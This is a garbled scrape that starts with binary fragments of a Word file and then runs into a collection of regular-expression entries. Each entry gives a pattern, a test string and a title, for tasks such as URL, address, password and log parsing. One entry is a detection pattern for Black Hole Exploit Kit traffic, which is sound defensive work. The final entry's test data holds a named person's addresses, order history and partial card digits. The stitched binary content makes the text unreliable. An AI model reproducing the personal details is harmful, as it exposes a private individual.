rfm?$,?z???=?????????2??????/????3s?????????????o <*Ç4&?$Gh??????k9???F??gl&???Z*??T??oN1????!no??*???]??A$&?Vh?b??9?pQ?????$???I???a??.N???&)0g^????8f?1`b??(???B*??C??]?.?X?;u0????j?M?1?eZ?3????m?????-r?"?+0?0~H???x?p%r?cV? ??*#S??q=? ?!a?"e???[J??L?.??.R(zP%??????iv@????@@?b??U|????!8Y???8?>? n??1iV ??DT??:?N??l???`u??c??q3 ?m5qU>??Q??o+eo??U?3?'?z?$=w?????[x??h??%?9?#g8????yQ?_<%?XZ?E?N???????1el????f?-a??0?'?C')?ai_u+? l? ???TE???k?{ZH(3?D)?p4Õ?5v??6??b?Cb??;?????F!?X?3m?hE8???+?P??U??Qg?V7?Vt?.??s9??p ?hB? ?A?W??U?i3????i1Y???$??{>Gu???V??~?b?G?S?V???b_C?Y?TV?X?.???d)??Y?@??vdI?9Y???^???????7??2|?S??I?B?o???ej3?.?e??;?6A.?l??vx Rma??0??`??d?_nBX/? 6:?+kPo? ???Z2_??]??????"bGh?&bC?u????p?aA????y??s?t?;1?????V?h??n???<???*m7?????J???g????V?n?F?S????BiD???????????PTpGm?r????2L[?)R?? ?!{@K??NV??.+?e?LE???5{Dj?k??"(u?& ???s???z?S?7???????????N?<l64y????lU????|?-;?_?Y??+@Yi)hem??&?s???5??r37?8?1?.????>#????:????~?? l??/??iG?q?????(?l??/???-?????,?>g???????va'?vla?!?'[???I?$??RV?1???B???G?S??R%0??????F3u?o??PK! ???'theme/theme/_rels/themeManager.xml.rels??M ?0???woo??&?????5 6?$Q?? ?,.?a??i????c2?1h?:??q??m???@RN??;d?`??o7?g?K(M&$R(.1?r'J???T???8??V?"??A??H?u}???|?$?b{??P????8?g/]?QAs?(????#??L?[??????PK-!????[Content_Types].xmlPK-!????60_rels/.relsPK-!ky???theme/theme/themeManager.xmlPK-!?2/???theme/theme/theme1.xmlPK-! ???'?theme/theme/_rels/themeManager.xml.relsPK]? <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>???? ?8?@????????????0?(? ??B ?S??????Oh??? ??? ?5{a?? ?@??????@??Unknown????????????G??*?Ax??Times New Roman5??Symbol3.??*?Cx??Arial7.?????@?CalibriA????$B?Cambria Math"q??????2Gi:8??E??E????????0J????HP??$P??????????????????????52!xx????Iris RutsIris Ruts???????Oh??+'??0H????????? (08@?Iris RutsNormalIris Ruts2Microsoft Office Word@??J?@lg????E?????.??+,??0?hp|??????? ???Titel???? ???????? !"#$%&????????)????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????Root Entry?????????F`?x???+?1Table???????? DWordDocument????????.SummaryInformation(????DocumentSummaryInformation8????????????CompObj????????????r?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? ?????F Microsoft Word 97-2003-document MSWordDocWord.Document.8?9?q
Meta book descr
2016-06-07T13:13:15.000Z
gets the url instagram
^(https://)?(www\.)?(instagram\.com)?/?[\w.]+/?$
https://www.instagram.com/lceymard/ lceymard/ /lceymard/ instagram.com/lceymard instagram.com/lceymard/ www.instagram.com/lceymard www.instagram.com/lceymard/ https://www.instagram.com/lceymard https://www.instagram.com/lceymard/
instagram url
2023-11-05T16:11:38.000Z
When encountering more than 1 pmid, make sure to return the first one
<meta\s*?name="(?:ncbi_uidlist|citation_pmid)"\s*?content="(\d{8})"\s*?\/?>
<meta name="ncbi_uidlist" content="12345678" /><meta name="citation_pmid" content="87654321" />
Match first PMID
2015-10-06T10:34:34.000Z
http://stackoverflow.com/questions/34674917/is-regex-a-costly-operation-it-seems-atleast
\s*([^:\s]+\s+[^:\s]+)\s*(?:\([^()]*\))?:\s*(\S*)\s*(\w+)
%DATA-4-JSON: POP 0/1/0 (1: object): JSON object data
Optimized regex for SO question
2016-01-08T14:30:52.000Z
{\s*{\s*#\s*(?<operator>endcase|endswitch|endfor|endif|if|elif|else|for|switch|case|default)\s*(?<args>[^}]*)\s*}\s*}\s*(?<body>[^{]*(?:\s*{\s*{\s*#\s*(?!(?&operator))\s*[^}]*\s*}\s*}\s*[^{]*)*)
<div> {{#if arg1.arg2}} <span>{{#var arg3 static}}</span> blablabla{{#for k, v in arg4}} <p>{{#var k}}<span>{{#var v.arg5}}</span></p> {{#if (k == "test" or v != 0) and k == 0}} <span></span> {{#elif k == 0}} <p></p> {{#else}} <div></div> {{#endif}} {{#endfor}} {{#endif}} {{#switch arg6}} {{#case 5}} case 5 {{#case 6, 7, 8}} case 6, 7, 8 {{#endcase}} {{#default}} def {{#endcase}} {{#endswitch}} {{#for i as 0, 5}} test i {{#endfor}}
Универсальная регулярка для выпаршивания полного стека логических операторов шаблонизатора HTML.
2017-12-25T06:41:06.000Z
{\"hiRes\":\"(http.:.*?.jpg)\"
'colorImages': { 'initial': [{"hiRes":"https://images-na.ssl-images-amazon.com/images/I/71rUs2a23JL._UL1500_.jpg","thumb":"https://images-na.ssl-images-amazon.com/images/I/41Mdl3E%2BDVL._US40_.jpg","large":"https://images-na.ssl-images-amazon.com/images/I/41Mdl3E%2BDVL.jpg","main":{"https://images-na.ssl-images-amazon.com/images/I/71rUs2a23JL._UX395_.jpg":[221,395],"https://images-na.ssl-images-amazon.com/images/I/71rUs2a23JL._UX500_.jpg":[280,500],"https://images-na.ssl-images-amazon.com/images/I/71rUs2a23JL._UX535_.jpg":[300,535],"https://images-na.ssl-images-amazon.com/images/I/71rUs2a23JL._UX575_.jpg":[322,575],"https://images-na.ssl-images-amazon.com/images/I/71rUs2a23JL._UX625_.jpg":[350,625],"https://images-na.ssl-images-amazon.com/images/I/71rUs2a23JL._UX675_.jpg":[378,675],"https://images-na.ssl-images-amazon.com/images/I/71rUs2a23JL._UX695_.jpg":[390,695]},"variant":"MAIN","lowRes":null},{"hiRes":"https://images-na.ssl-images-amazon.com/images/I/71XPS4SKK0L._UL1418_.jpg","thumb":"https://images-na.ssl-images-amazon.com/images/I/51azLW7w-TL._US40_.jpg","large":"https://images-na.ssl-images-amazon.com/images/I/51azLW7w-TL.jpg","main":{"https://images-na.ssl-images-amazon.com/images/I/71XPS4SKK0L._UY395_.jpg":[395,340],"https://images-na.ssl-images-amazon.com/images/I/71XPS4SKK0L._UY500_.jpg":[500,431],"https://images-na.ssl-images-amazon.com/images/I/71XPS4SKK0L._UY535_.jpg":[535,461],"https://images-na.ssl-images-amazon.com/images/I/71XPS4SKK0L._UY575_.jpg":[575,495],"https://images-na.ssl-images-amazon.com/images/I/71XPS4SKK0L._UY625_.jpg":[625,538],"https://images-na.ssl-images-amazon.com/images/I/71XPS4SKK0L._UY675_.jpg":[675,581],"https://images-na.ssl-images-amazon.com/images/I/71XPS4SKK0L._UY695_.jpg":[695,598]},"variant":"FRNT","lowRes":null},{"hiRes":"https://images-na.ssl-images-amazon.com/images/I/71LucgsNwxL._UL1500_.jpg","thumb":"https://images-na.ssl-images-amazon.com/images/I/51v3RvzllDL._US40_.jpg","large":"https://images-na.ssl-images-amazon.com/images/I/51v3RvzllDL.jpg","main":{"https://images-na.ssl-images-amazon.com/images/I/71LucgsNwxL._UY395_.jpg":[395,260],"https://images-na.ssl-images-amazon.com/images/I/71LucgsNwxL._UY500_.jpg":[500,329],"https://images-na.ssl-images-amazon.com/images/I/71LucgsNwxL._UY535_.jpg":[535,352],"https://images-na.ssl-images-amazon.com/images/I/71LucgsNwxL._UY575_.jpg":[575,378],"https://images-na.ssl-images-amazon.com/images/I/71LucgsNwxL._UY625_.jpg":[625,411],"https://images-na.ssl-images-amazon.com/images/I/71LucgsNwxL._UY675_.jpg":[675,444],"https://images-na.ssl-images-amazon.com/images/I/71LucgsNwxL._UY695_.jpg":[695,457]},"variant":"BACK","lowRes":null},{"hiRes":"https://images-na.ssl-images-amazon.com/images/I/71g8Hc5xfuL._UL1500_.jpg","thumb":"https://images-na.ssl-images-amazon.com/images/I/41qsIQDhREL._US40_.jpg","large":"https://images-na.ssl-images-amazon.com/images/I/41qsIQDhREL.jpg","main":{"https://images-na.ssl-images-amazon.com/images/I/71g8Hc5xfuL._UX395_.jpg":[156,395],"https://images-na.ssl-images-amazon.com/images/I/71g8Hc5xfuL._UX500_.jpg":[198,500],"https://images-na.ssl-images-amazon.com/images/I/71g8Hc5xfuL._UX535_.jpg":[211,535],"https://images-na.ssl-images-amazon.com/images/I/71g8Hc5xfuL._UX575_.jpg":[227,575],"https://images-na.ssl-images-amazon.com/images/I/71g8Hc5xfuL._UX625_.jpg":[247,625],"https://images-na.ssl-images-amazon.com/images/I/71g8Hc5xfuL._UX675_.jpg":[267,675],"https://images-na.ssl-images-amazon.com/images/I/71g8Hc5xfuL._UX695_.jpg":[275,695]},"variant":"BOTT","lowRes":null},{"hiRes":"https://images-na.ssl-images-amazon.com/images/I/819xxO8wtKL._UL1500_.jpg","thumb":"https://images-na.ssl-images-amazon.com/images/I/41RFoo9VFKL._US40_.jpg","large":"https://images-na.ssl-images-amazon.com/images/I/41RFoo9VFKL.jpg","main":{"https://images-na.ssl-images-amazon.com/images/I/819xxO8wtKL._UX395_.jpg":[141,395],"https://images-na.ssl-images-amazon.com/images/I/819xxO8wtKL._UX500_.jpg":[179,500],"https://images-na.ssl-images-amazon.com/images/I/819xxO8wtKL._UX535_.jpg":[191,535],"https://images-na.ssl-images-amazon.com/images/I/819xxO8wtKL._UX575_.jpg":[206,575],"https://images-na.ssl-images-amazon.com/images/I/819xxO8wtKL._UX625_.jpg":[224,625],"https://images-na.ssl-images-amazon.com/images/I/819xxO8wtKL._UX675_.jpg":[241,675],"https://images-na.ssl-images-amazon.com/images/I/819xxO8wtKL._UX695_.jpg":[249,695]},"variant":"TOPP","lowRes":null},{"hiRes":"https://images-na.ssl-images-amazon.com/images/I/81--RbyNuUL._UL1500_.jpg","thumb":"https://images-na.ssl-images-amazon.com/images/I/41YSdrcTqUL._US40_.jpg","large":"https://images-na.ssl-images-amazon.com/images/I/41YSdrcTqUL.jpg","main":{"https://images-na.ssl-images-amazon.com/images/I/81--RbyNuUL._UX395_.jpg":[179,395],"https://images-na.ssl-images-amazon.com/images/I/81--RbyNuUL._UX500_.jpg":[227,500],"https://images-na.ssl-images-amazon.com/images/I/81--RbyNuUL._UX535_.jpg":[243,535],"https://images-na.ssl-images-amazon.com/images/I/81--RbyNuUL._UX575_.jpg":[261,575],"https://images-na.ssl-images-amazon.com/images/I/81--RbyNuUL._UX625_.jpg":[284,625],"https://images-na.ssl-images-amazon.com/images/I/81--RbyNuUL._UX675_.jpg":[306,675],"https://images-na.ssl-images-amazon.com/images/I/81--RbyNuUL._UX695_.jpg":[315,695]},"variant":"RGHT","lowRes":null},{"hiRes":"https://images-na.ssl-images-amazon.com/images/I/817FsYTPhML._UL1500_.jpg","thumb":"https://images-na.ssl-images-amazon.com/images/I/41NPYu5THcL._US40_.jpg","large":"https://images-na.ssl-images-amazon.com/images/I/41NPYu5THcL.jpg","main":{"https://images-na.ssl-images-amazon.com/images/I/817FsYTPhML._UX395_.jpg":[207,395],"https://images-na.ssl-images-amazon.com/images/I/817FsYTPhML._UX500_.jpg":[263,500],"https://images-na.ssl-images-amazon.com/images/I/817FsYTPhML._UX535_.jpg":[281,535],"https://images-na.ssl-images-amazon.com/images/I/817FsYTPhML._UX575_.jpg":[302,575],"https://images-na.ssl-images-amazon.com/images/I/817FsYTPhML._UX625_.jpg":[328,625],"https://images-na.ssl-images-amazon.com/images/I/817FsYTPhML._UX675_.jpg":[355,675],"https://images-na.ssl-images-amazon.com/images/I/817FsYTPhML._UX695_.jpg":[365,695]},"variant":"PAIR","lowRes":null},{"hiRes":"https://images-na.ssl-images-amazon.com/images/I/81i0Ifd3YfL._UL1500_.jpg","thumb":"https://images-na.ssl-images-amazon.com/images/I/41DlHpTRJfL._US40_.jpg","large":"https://images-na.ssl-images-amazon.com/images/I/41DlHpTRJfL.jpg","main":{"https://images-na.ssl-images-amazon.com/images/I/81i0Ifd3YfL._UX395_.jpg":[183,395],"https://images-na.ssl-images-amazon.com/images/I/81i0Ifd3YfL._UX500_.jpg":[232,500],"https://images-na.ssl-images-amazon.com/images/I/81i0Ifd3YfL._UX535_.jpg":[248,535],"https://images-na.ssl-images-amazon.com/images/I/81i0Ifd3YfL._UX575_.jpg":[267,575],"https://images-na.ssl-images-amazon.com/images/I/81i0Ifd3YfL._UX625_.jpg":[290,625],"https://images-na.ssl-images-amazon.com/images/I/81i0Ifd3YfL._UX675_.jpg":[313,675],"https://images-na.ssl-images-amazon.com/images/I/81i0Ifd3YfL._UX695_.jpg":[323,695]},"variant":"LEFT","lowRes":null}]},
IMG_FULL_1 2 3 4 5 6 7 8 (PAG2)
2018-12-22T05:24:23.000Z
(?P<position>top|left)\s*\:\s*(?P<value>[\d]+(?:\.[\d]+)?)(?P<measure>px|%|em|pt);?
position: absolute; cursor: pointer; width: 20px; height: 20px; left: 995.503px; top: 297.366px;
Get top and left style elements from html style attribute
2017-11-11T11:16:47.000Z
Validates protocol, sub-domain, domain, and top-level domain. No port number and query string parameters validation is made.
(?<Protocol>(http(s)?)):\/\/(?<SubDomain>([a-zA-Z]{1,3}\.))?(?<Domain>[a-zA-Z0-9]{2,})\.(?<TopLevelDomain>[a-zA-Z0-9]{2,}(\.[a-zA-Z0-9]{2,})?)
Simple URL validation
2023-10-27T11:27:13.000Z
English address that can start with numbers, # sign or words (\w) followed with any combination of previously mentioned. Multi-line, global and case insensitive supported. **Address CANNOT START WITH \w character _ or 0 or any other symbols**
((^([#1-9]{1,}[0-9 ]+))|(^[a-zA-Z]+))[\w -]*
36 Wellington Way Mona Kingston 6 Jamaica 109 Garden View #2345 West Glade Avenue 34 South Haven Xy-90
English address
2023-10-19T21:59:14.000Z
(?xm) (?(DEFINE) (?<byte> 2[0-4]\d | 25[0-5] | 1\d\d | [1-9]?\d) ) ^ (10 (?:\.(?&byte)){3} | 172 \. (?: 1 [6-9] | 2\d | 3[01] ) (?:\.(?&byte)){2} | 192 \. 168 (?:\.(?&byte)){2} | ) $
10.0.0.0 10.1.2.3 10.255.255.255 172.16.0.0 172.25.1.2.3 172.31.255.255 12.34.56.78 123.456.789.0 192.168.0.555 192.168.0.0 192.168.1.2 192.168.255.255
Grab valid LAN IPs
2015-11-05T07:14:32.000Z
doesn't work yet
(<[^>"]*)(")([^>]*>)
<p><a href="#" target="_blank">test</a><br></p><p>and [ another " test ]<br></p>
match quotes inside tags
2016-08-19T09:27:42.000Z
Regular expression for password validation Rules: - 8-120 chars - no spaces - must contain at least one a-z char - must contain at least one A-Z char - must contain at least one digit - must contain at least one of the folowing chars: !@#$%^&*()-=¡£_+`~.,<>/?;:'\"|[]{}
^.*(?=.{8,120})(?!.*\s)(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[\!\@\#\$\%\^\&\*\(\)\-\=\¡\£\_\+\`\~\.\,\<\>\/\?\;\:\'\"\\\|\[\]\{\}]).*$
asdasdasASDA213423!@!#
Password strength
2015-08-20T14:32:18.000Z
This expression should both normal and wildcard targets and rules wrapped in simple sub-shell or varriable substitution enclosures.
(?P<assign_op>(\:|\!|\?)?=)|(?P<token_subst>$|%(\<\@))|(?P<token_ident>[\w\d\.\,]+)|(?P<target_name_match>%\.?)|(?P<token_rule_sep>[:])|(?P<incr_op>\n)|(?P<line_end>\n)|(?P<comment_op>#[.*]+$)|(?P<adjust_parser>[\$%\s\t\:])
CC := nasm BOOT_REQ := text.o FREELDR_SRCS := freeldr.c IMG_NAME := boot.img TEXT_SECTION := 7c00 # UFS2, ZFS and/or RAW FILESYSTEMS := CPU_FLAGS := PAE SDK_FLAGS := VERSION := "1.00.00" %.o: $(ASM) ${SDK_FLAGS} -f bin -o $@ $(patsubst %.bin,%.asm,$@)) ${IMG_NAME}: $(BOOT_REQ) $(FREELDR_SRCS:.c=.o)
Basic grammar for regex matching of simplistic Makefiles
2014-08-13T01:11:06.000Z
try1
Incoming flow rate \[5s\: \((\d?\.\d?)\)
Aug 14 16:02:48 127.0.0.1  [SourceMonitorTimerTask] com.q1labs.sem.monitors.SourceMonitor: [INFO] [NOT:0000006000][10.247.75.70/- -] [-/- -]Incoming flow rate [5s: (601.20):(601.20) fps], [10s: (600.60):(600.60) fps], [15s: (600.80):(600.80) fps], [30s: (601.00):(601.00) fps], [60s: (601.10):(601.10) fps], [300s: (603.04):(603.11) fps], [900s: (603.04):(603.11) fps]. Peak in the last 60s: (603.60):(603.60) fps. Max Seen (1732.00):(1596.60) fps. 
try1
2015-08-14T16:32:38.000Z
HTTP method = “GET” Requested file type ENDS WITH ".php" Requested file type = “x-msdownload” Request MATCHES Regular Expression
[A-Za-z]f=[0-9]{10}&[A-Za-z]e=[0-9]{20}&[A-Z]=[0-9]{2}.*
Black Hole Exploit Kit
2015-10-20T14:11:53.000Z
Requirements format that needs to be parsed.
\[(?P<id>[\d.]+)\]
[2.1.1.1] M_1.0_4.1.6.1: A requirement, may have any types "of symbols." ::== And multiple lines describing futher information about this requirement. With the possibility of being completely empty, placeholders should not match.
requirements
2014-09-09T12:52:22.000Z
A javascript regex for parsing an S3 log line.
(\S+) (\S+) \[([\w:/]+\s[+\-]\d{4})\] ([\d.]+) (\S+) (\S+) (\S+) (\S+) "(.+?)" \d{3} (\S+) (\S+) (\d+) (\d+) (\S+) "(.+?)" "(.+?)" (\S+)
S3 Access Log Analyzer
2014-11-28T23:34:38.000Z
[\/\*A-Z0-9_\s]*(?=\{)\{CAN_SID[A-Z0-9_]+(?=(_([A-Z0-9]{6}[0-9]))).+(?=(CAN_SID[A-Z0-9_]+(?=(_([A-Z0-9]{6}[0-9])))))
/* UACK */ {CAN_SID_UACK_IDT1S03, CAN_SID_N_UACK_0_IDT1S03}, /* blah blah blah */ {RSTART_
CAN1
2020-05-08T06:54:29.000Z
Goes through a Plain text derived from a PDF capturing the order number, the items, the order and ship dated and the costs.
(Final Details for Order #)([-#0-9]{19})\R*(Order Placed\:\s)(([JFMASOND][aepuco][nbrylgptvc]).+?)([123][0-9],\s)(20[0-2][0-9])(.+?)(Amazon\.com\sorder\snumber\:\s\2)(.+?)(Order\sTotal\:\s(\$?[0-9]{1,3}(?:,?[0-9]{3})*\.[0-9]{2}$)).*?(\r|\n).*?(Shipped\son\s)(([JFMASOND][aepuco][nbrylgptvc].+?)\s([123][0-9],)\s(20[0-2][0-9])).*?(\n|\r).*?(Items\sOrdered\s\dof\:(.+?))(Sold\s\by\:\s)(.+?)(Price\s)(\$?[0-9]{1,3}(?:,?[0-9]{3})*\.[0-9]{2}$).+?(Condition\:\s)(New|Used)
Final Details for Order #110-1427559-5201803 Order Placed: January 22, 2015 Amazon.com order number: 110-1427559-5201803 Order Total: $383.48 Shipped on January 23, 2015 Items Ordered 1 of: ASUS VG278HE 27-Inch Screen LED-lit Monitor 144hz 2ms Sold by: Amazon.com Services LLC Price $368.99 Condition: New Shipping Address: Brian J Coady THE UPS STORE 1380 MONROE ST NW NORTHWEST WASHINGTON, DC 20010-3452 United States Shipping Speed: Two-Day Shipping Shipped on January 23, 2015 Items Ordered Price 1 of: Safewatts AC Adapter Power Supply Charger for Asus Chromebook C200 $14.49 /C200MA-DS01, C300 /C300MA-DB01, 11.6" K200MA, 15" K553MA, X200CA X102BA Notebook, Sold by: SAFEWATTS (seller profile) | Product question? Ask Seller Condition: New Shipping Address: Brian J Coady THE UPS STORE 1380 MONROE ST NW NORTHWEST WASHINGTON, DC 20010-3452 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Debit Card | Last digits: 4883 Item(s) Subtotal: $383.48 Shipping & Handling: $0.00 ---- Billing address Brian J Coady 1454 MONROE ST NW Total before tax: $383.48 Estimated tax to be collected: $0.00 ---- WASHINGTON, DC 20010-3139 Grand Total:$383.48 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #110-6914621-1021845 Order Placed: January 22, 2015 Amazon.com order number: 110-6914621-1021845 Order Total: $10.98 Shipped on January 22, 2015 Items Ordered Price 1 of: SquareTrade 2-Year PC Peripherals Protection Plan ($250-$300) Sold by: Allstate Protection Plans (seller profile) $10.38 Condition: New Shipping Address: Brian J Coady THE UPS STORE 1380 MONROE ST NW NORTHWEST WASHINGTON, DC 20010-3452 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $10.38 Debit Card | Last digits: 4883 Shipping & Handling: $0.00 Billing address Total before tax: $10.38Brian J Coady Estimated tax to be collected: $0.601454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$10.98 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #110-2329717-2800245 Order Placed: February 19, 2015 Amazon.com order number: 110-2329717-2800245 Order Total: $8.50 Shipped on February 19, 2015 Items Ordered 1 of: Acentix® -Set of 3 Pentalobe Screwdrivers for Apple iPhone Macbook Pro, Air Retina -Star 0.8 mm, 1.2 mm & 1.5 mm or P2 P5 P6 or TS1 TS4 TS5 Sold by: EsellerDirect (seller profile) Price $8.50 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $8.50 Debit Card | Last digits: 4883 Shipping & Handling: $0.00 Billing address Total before tax: $8.50Brian J Coady Estimated tax to be collected: $0.00 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Grand Total:$8.50 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #104-1896073-8305021 Order Placed: September 4, 2015 Amazon.com order number: 104-1896073-8305021 Order Total: $168.11 Shipped on September 4, 2015 Items Ordered 2 of: David Archy Men's 4 Pack France Dew Retting Linen Trunks(M, Linen) Sold by: CN-Smashing (seller profile) | Product question? Ask Seller Price $17.90 Condition: New Shipping Address: Brian J Coady THE UPS STORE 1380 MONROE ST NW NORTHWEST WASHINGTON, DC 20010-3452 United States Shipping Speed: Two-Day Shipping Shipped on September 5, 2015 Items Ordered 1 of: Cubavera Men's Drawstring Pant with Back Elastic Waistband, Gray Dawn, Medium Sold by: Amazon.com Services LLC Price $31.99 Condition: New 1 of: John Varvatos Men's Authentic Fit Jean, Spice, 33 Regular Sold by: Amazon.com Services LLC $65.33 Condition: New Shipping Address: Brian J Coady THE UPS STORE 1380 MONROE ST NW NORTHWEST WASHINGTON, DC 20010-3452 United States Shipping Speed: Two-Day Shipping Print this page for your records. Shipped on September 4, 2015 Items Ordered Price 1 of: High Style Men's Casual 100% linen pants(9505A, DressBlues, 34) $34.99 Sold by: Mariyaab (seller profile) | Product question? Ask Seller Condition: New Shipping Address: Brian J Coady THE UPS STORE 1380 MONROE ST NW NORTHWEST Grand Total:$168.11 WASHINGTON, DC 20010-3452 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Debit Card | Last digits: 0079 Item(s) Subtotal: $168.11 Shipping & Handling: $0.00 Billing address Brian Joseph Coady 1454 Monroe St. NW Total before tax: $168.11 Estimated tax to be collected: $0.00 Washington, DC 20010 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #104-3953625-9533006 Order Placed: September 4, 2015 Amazon.com order number: 104-3953625-9533006 Seller's order number: 16053159 Order Total: $120.49 Shipped on September 8, 2015 Items Ordered Price 1 of: John Varvatos Men's Authentic Fit Jean, Spice, 36 Regular $74.00 Sold by: specialplace (seller profile) Condition: New 1 of: Calvin Klein Men's Cotton Linen 5 Pocket Pant, Blue Shield, 33x30 $38.00 Sold by: specialplace (seller profile) Condition: New Shipping Address: Brian J Coady THE UPS STORE 1380 MONROE ST NW NORTHWEST WASHINGTON, DC 20010-3452 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $112.00 Debit Card | Last digits: 0079 Shipping & Handling: $8.49 Billing address Total before tax: $120.49 Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$120.49 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #104-7934286-9005841 Order Placed: September 4, 2015 Amazon.com order number: 104-7934286-9005841 Order Total: $36.00 Shipped on September 5, 2015 Items Ordered Price 1 of: Men's 100% Merino Wool Lightweight Short Sleeve Crew T Shirt (L, Silver) Sold by: HappyFeets (seller profile) $36.00 Condition: New Shipping Address: Brian J Coady THE UPS STORE 1380 MONROE ST NW NORTHWEST WASHINGTON, DC 20010-3452 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $36.00 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $36.00Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$36.00 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #104-9046505-6534624 Order Placed: September 16, 2015 Amazon.com order number: 104-9046505-6534624 Order Total: $453.80 Shipped on September 17, 2015 Items Ordered 1 of: Polo Ralph Lauren Custom Fit Plaid Silk-Linen Workshirt -Navy (Medium) Sold by: ACMR Group (seller profile) Condition: New 1 of: Belt for Buckles 100% Top Grain One Piece Leather Basket Weave Uniform Belt, Made in USA, SIZE S,1304 Sold by: the price point (seller profile) Condition: New 1 of: O'Neill Men's Santa Cruz Solid Boardshort, Red 15, 34 Sold by: Amazon.com Services LLC Condition: New 1 of: 7 for All Mankind Men's Jean Belt, Black, 32 Sold by: Amazon.com Services LLC Condition: New 2 of: Woolly Clothing Co. Men's Merino Wool Boxer Brief Large Black With Purple Stitching Sold by: Woolly Clothing Co (seller profile) Condition: New 1 of: Paul Fredrick Men's Pure Silk Grid Pattern Short Sleeve Polo-Collar Sweater Black Medium Sold by: Paul Fredrick (seller profile) Condition: New 1 of: Pendleton Men's Fitted Board Shirt, Solid Grey, Large Sold by: Amazon.com Services LLC Condition: New 1 of: Cubavera Men's Long Sleeve Guayabera, Black, Large Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian Coady 412 WESTCHESTER DR ROCKFORD, IL 61107-4758 United States Shipping Speed: Price $74.93 $14.99 $14.51 $17.56 $29.99 $44.95 $120.00 $27.48 Two-Day Shipping Shipped on September 17, 2015 Items Ordered 1 of: Louis Raphael ROSSO Men's Washable Wool Blend Flat Front Dress Pant, Black33x30 Sold by: Amazon.com Services LLC Price $23.99 Condition: New 1 of: Louis Raphael Men's Total Comfort Stretch Wool Solid Pleated Dress Pant, Black, 34x29 Sold by: Amazon.com Services LLC $28.90 Condition: New Shipping Address: Brian Coady 412 WESTCHESTER DR ROCKFORD, IL 61107-4758 United States Shipping Speed: Two-Day Shipping Shipped on September 17, 2015 Items Ordered 1 of: Distinct: Men's Genuine Leather 1.25" Ratchet Belt by Gary Majdell Sport Black 32 Sold by: Majdell Group (seller profile) | Product question? Ask Seller Price $11.97 Condition: New Shipping Address: Brian Coady 412 WESTCHESTER DR ROCKFORD, IL 61107-4758 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $439.26 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $439.26 Brian Joseph Coady Estimated tax to be collected: $14.54 1454 Monroe St. NW ---- Washington, DC 20010 Grand Total:$453.80 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #104-9671480-2555408 Order Placed: September 16, 2015 Amazon.com order number: 104-9671480-2555408 Order Total: $11.09 Shipped on September 17, 2015 Items Ordered Price 1 of: Champion 6.3 oz. Cotton Jersey Shorts>M NAVY 8187 Sold by: SaveMax Marketplace (seller profile) $11.09 Condition: New Shipping Address: Brian Coady 412 WESTCHESTER DR ROCKFORD, IL 61107-4758 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $11.09 Debit Card | Last digits: 0079 Shipping & Handling: $0.00 Billing address Total before tax: $11.09 Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$11.09 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #105-0952262-2427443 Order Placed: October 1, 2015 Amazon.com order number: 105-0952262-2427443 Order Total: $49.55 Shipped on October 2, 2015 Items Ordered Price 1 of: 1 Pair Limited Edition Men's SuperSoft Linen and Silk OTC Socks-Italy-Bronze Sold by: CustomShirt1 at Artists Woods (seller profile) $35.00 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Payment information Payment Method: Item(s) Subtotal: $35.00 Debit Card | Last digits: 0079 Shipping & Handling: $14.55 Billing address Total before tax: $49.55 Brian Joseph Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$49.55 United States Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #105-5492363-8926663 Order Placed: October 1, 2015 Amazon.com order number: 105-5492363-8926663 Seller's order number: 16116605 